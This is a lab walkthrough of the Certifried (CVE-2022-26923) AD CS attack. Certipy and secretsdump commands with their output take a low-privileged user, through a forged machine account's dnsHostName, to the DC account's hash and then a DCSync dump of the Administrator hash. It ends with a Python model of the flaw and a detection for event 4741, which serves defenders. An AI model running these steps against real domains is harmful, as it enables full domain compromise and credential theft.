## Environment

| IP | Hostname | Role |
| --- | --- | --- |
| 10.10.10.146 | DC | Domain controller |
| 10.10.10.145 | CS | Certificate server (AD CS), CA name `s-CS-CA` |
| 10.10.10.135 | kali | Attacker machine |
- /etc/hosts (attacker machine)

```
10.10.10.146 dc
10.10.10.146 dc.s.com
10.10.10.145 cs
10.10.10.145 cs.s.com
10.10.10.145 s-CS-CA
```
## Exploitation

### Requesting a certificate for the low-privileged user

First, use the built-in `User` certificate template to request a certificate for our low-privileged domain user (chenqi:Cqadmin@123) with Certipy (https://github.com/ly4k/Certipy). This step proves that the CA at 10.10.10.145 is reachable and that PKINIT authentication against the DC works before we touch any machine accounts.
```
certipy req -u chenqi@s.com -p 'Cqadmin@123' -ca s-CS-CA -template User -dc-ip 10.10.10.146 -target 10.10.10.145
```

- Verify that the certificate is valid by authenticating with it (Certipy obtains a TGT via PKINIT and then recovers the NT hash through the U2U/PAC trick):

```
certipy auth -pfx chenqi.pfx -dc-ip 10.10.10.146 -debug
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: chenqi@s.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'chenqi.ccache'
[*] Trying to retrieve NT hash for 'chenqi'
[*] Got hash for 'chenqi@s.com': aad3b435b51404eeaad3b435b51404ee:9b60fc74a64a405abacbf9803e700418
```
### Creating a machine account

Certipy creates the computer object over LDAPS rather than SAMR. A machine account created through the SAMR protocol has no `dnsHostName` and no UPN attribute by default, while an LDAP add lets us set `dnsHostName` to whatever we like, and it is `dnsHostName` that the CA copies into the DNS SAN of a certificate issued from the `Machine` template. Any domain user can do this as long as the domain's `ms-DS-MachineAccountQuota` (default 10) has not been exhausted. On a domain controller that lacks the May 2022 update (KB5014754 for CVE-2022-26923), the DC does not check that `dnsHostName` matches the account's own `sAMAccountName`, so we point it at the DC's hostname.
```
# set the new computer's dnsHostName to the domain controller's hostname
certipy account create -u chenqi@s.com -p 'Cqadmin@123' -dc-ip 10.10.10.146 -user newcomputer -dns DC.s.com
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Creating new account:
    sAMAccountName                      : newcomputer$
    unicodePwd                          : 9Qo3NQ8ItahV5FUT
    userAccountControl                  : 4096
    servicePrincipalName                : HOST/newcomputer
                                          RestrictedKrbHost/newcomputer
    dnsHostName                         : DC.s.com
[*] Successfully created account 'newcomputer$' with password '9Qo3NQ8ItahV5FUT'
```
### Requesting a certificate for the new machine account

Request a certificate from the `Machine` template as `newcomputer$`. Note the two lines that matter in the output: the certificate's DNS SAN is `DC.s.com` (copied from `dnsHostName`), and the certificate carries no object SID extension, so the KDC will have to identify the account from the SAN alone.

```
certipy req -u newcomputer$@s.com -p 9Qo3NQ8ItahV5FUT -dc-ip 10.10.10.146 -ca s-CS-CA -target 10.10.10.145 -template Machine -debug
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.10.145[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.10.145[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 30
[*] Got certificate with DNS Host Name 'DC.s.com'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'dc.pfx'
```
### Authenticating as the domain controller

Because the certificate has no SID extension, the KDC maps it purely by its SAN `DC.s.com`, which resolves to the `DC$` account rather than to `newcomputer$`. Certipy therefore obtains a TGT for `dc$` and recovers the DC machine account's NT hash:

```
certipy auth -pfx dc.pfx -dc-ip 10.10.10.146
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: dc$@s.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc.ccache'
[*] Trying to retrieve NT hash for 'dc$'
[*] Got hash for 'dc$@s.com': aad3b435b51404eeaad3b435b51404ee:802e8ec76f455c3fb0377ebd3961bd1e
```
### Dumping the hash of any domain user

The DC machine account has replication rights, so its NT hash is enough for a DCSync (DRSUAPI) dump with Impacket's secretsdump. Here only the Administrator account is pulled; dropping `-just-dc-user` dumps the whole NTDS.DIT. The `1` in front of the colon is just a placeholder for the LM half of `-hashes`; only the NT hash is actually used for authentication.

```
secretsdump.py -hashes 1:802e8ec76f455c3fb0377ebd3961bd1e s.com/DC$@10.10.10.146 -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4:::
[*] Cleaning up...
```
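To make clear why the `Machine` certificate issued to `newcomputer$` logs in as `dc$`, and what defenders can check for, here is an added Python illustration (not Certipy or Windows code). It models the pre-patch KDC mapping of a certificate's DNS SAN to an account, the `dnsHostName` validation that KB5014754 introduced (simplified to "own name plus the domain DNS suffix"; the real check also accepts configured allowed suffixes), and a detection pass over Windows event 4741 "computer account created" records. The directory snapshot, SIDs and event records are constructed sample data that mirror the walkthrough above.

```python
"""Certifried (CVE-2022-26923) mapping and detection, modelled on constructed data.

This is an added illustration, not Certipy or Windows code. The directory
snapshot, the objectSid values and the event 4741 records are all constructed
to mirror the walkthrough (DC.s.com, newcomputer$, user chenqi).
"""

DOMAIN = "s.com"

# Constructed directory snapshot: sAMAccountName -> attributes.
ACCOUNTS = {
    "DC$": {"dnsHostName": "DC.s.com", "objectSid": "S-1-5-21-1-1-1-1000"},
    "CS$": {"dnsHostName": "cs.s.com", "objectSid": "S-1-5-21-1-1-1-1001"},
    # The attacker-created account from the walkthrough: its dnsHostName points
    # at the DC even though its own name is newcomputer$.
    "newcomputer$": {"dnsHostName": "DC.s.com", "objectSid": "S-1-5-21-1-1-1-1105"},
}


def vulnerable_map_san_to_account(san_dns, accounts, domain=DOMAIN):
    """Pre-patch KDC behaviour (modelled): with no SID extension in the
    certificate, the account is derived from the dNSName SAN alone by stripping
    the domain suffix and appending '$'. Nobody asks which object enrolled, so
    'DC.s.com' resolves to DC$ even though newcomputer$ requested the cert."""
    host, sep, suffix = san_dns.partition(".")
    if not sep or suffix.lower() != domain.lower():
        return None
    wanted = (host + "$").lower()
    for sam in accounts:  # sAMAccountName comparison is case-insensitive
        if sam.lower() == wanted:
            return sam
    return None


def patched_map_cert_to_account(cert, accounts):
    """Post-KB5014754 behaviour (modelled): a certificate that carries the
    szOID_NTDS_CA_SECURITY_EXT SID extension (1.3.6.1.4.1.311.25.2) is bound to
    that SID; only a certificate without it falls back to the weak SAN mapping."""
    sid = cert.get("sid")
    if sid:
        for sam, attrs in accounts.items():
            if attrs["objectSid"] == sid:
                return sam
        return None
    return vulnerable_map_san_to_account(cert["san_dns"], accounts)


def expected_dns_host_name(sam_account_name, domain=DOMAIN):
    """The only dnsHostName a computer may set for itself after the patch:
    its own sAMAccountName without the '$', plus the domain DNS suffix
    (simplification: the real check also allows configured extra suffixes)."""
    return sam_account_name.rstrip("$") + "." + domain


def dns_host_name_allowed(sam_account_name, dns_host_name, domain=DOMAIN):
    """True when dnsHostName is consistent with the account's own name."""
    expected = expected_dns_host_name(sam_account_name, domain)
    return dns_host_name.lower() == expected.lower()


# Constructed records in the shape of Windows event 4741 (computer account
# created). Field names follow the EVTX EventData names for that event.
EVENTS_4741 = [
    {"EventID": 4741, "SubjectUserName": "chenqi",
     "SamAccountName": "newcomputer$", "DnsHostName": "DC.s.com"},
    {"EventID": 4741, "SubjectUserName": "Administrator",
     "SamAccountName": "WS01$", "DnsHostName": "ws01.s.com"},
    {"EventID": 4742, "SubjectUserName": "chenqi",
     "SamAccountName": "WS01$", "DnsHostName": "ws01.s.com"},
]


def suspicious_computer_creations(events, domain=DOMAIN):
    """Flag 4741 events whose DnsHostName does not match the new account's own
    name: the exact footprint of the 'certipy account create -dns DC.s.com'
    step above. Returns (creator, sAMAccountName, dnsHostName) tuples."""
    hits = []
    for event in events:
        if event.get("EventID") != 4741:
            continue
        if not dns_host_name_allowed(event["SamAccountName"],
                                     event["DnsHostName"], domain):
            hits.append((event["SubjectUserName"],
                         event["SamAccountName"], event["DnsHostName"]))
    return hits


if __name__ == "__main__":
    print("vulnerable mapping of DC.s.com ->",
          vulnerable_map_san_to_account("DC.s.com", ACCOUNTS))
    print("patched mapping with SID ->",
          patched_map_cert_to_account(
              {"san_dns": "DC.s.com", "sid": "S-1-5-21-1-1-1-1105"}, ACCOUNTS))
    print("suspicious 4741 events ->", suspicious_computer_creations(EVENTS_4741))
```

The detection function is the piece worth wiring into a SIEM: a 4741 whose `DnsHostName` does not start with the created account's own name is rare in normal operation and is precisely what the `certipy account create -dns DC.s.com` step leaves behind.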